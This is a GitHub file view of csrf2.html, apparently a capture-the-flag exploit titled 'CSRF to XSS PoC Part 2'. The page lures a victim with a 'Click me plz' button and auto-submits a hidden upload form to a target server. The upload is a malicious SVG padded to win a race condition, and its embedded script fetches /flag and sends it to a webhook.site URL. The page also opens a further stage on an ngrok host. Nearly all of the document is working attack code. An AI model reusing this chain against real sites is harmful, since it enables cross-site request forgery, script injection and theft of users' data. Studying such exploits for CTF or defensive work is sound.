-
Notifications
You must be signed in to change notification settings - Fork 19
/
Copy pathcsrf2.html
44 lines (38 loc) · 2.12 KB
/
csrf2.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<html>
<body>
<h1>CSRF to XSS PoC Part 2</h1>
<script>
function launch(){
var knownObjectId = new URLSearchParams(window.location.search).get('knownId');
window.open(`http://0.tcp.au.ngrok.io:13169/csrf3.html?knownId=${knownObjectId}`, '_blank'),focus();
var payload = [
'<?xml version="1.0" standalone="no"?>\r\n',
'<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\r\n',
'\r\n',
'<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">\r\n',
'\r\n',
'<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>\r\n'
];
// Required to exploit the race condition
for (let i=0; i < 20000; i++) {
payload.push('<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>\r\n');
}
payload.push('<script type="text/javascript">\r\n');
payload.push(`fetch("/flag").then((r) => r.text()).then((d) => window.location="https://webhook.site/2f2edfff-fd82-4d72-a5e2-8542b8566013?e="+btoa(d));\r\n`);
payload.push('\<\/script>\r\n');
payload.push('</svg>\r\n');
const dT = new DataTransfer();
const file = new File( payload, "exploit.svg" );
dT.items.add( file );
document.csrf[0].files = dT.files;
document.csrf.submit()
}
</script>
<form style="display: none" name="csrf" method="post" action="http://monkestorage:3000/upload" enctype="multipart/form-data">
<input id="file" type="file" name="file" hidden/>
<input id="share_key" type="hidden" name="share_key" value="ff373618fbefa19991f1e123"/>
<input type="submit" name="" value="" size="0"/>
</form>
<button value="button" onclick="launch()">Click me plz</button>
</body>
</html>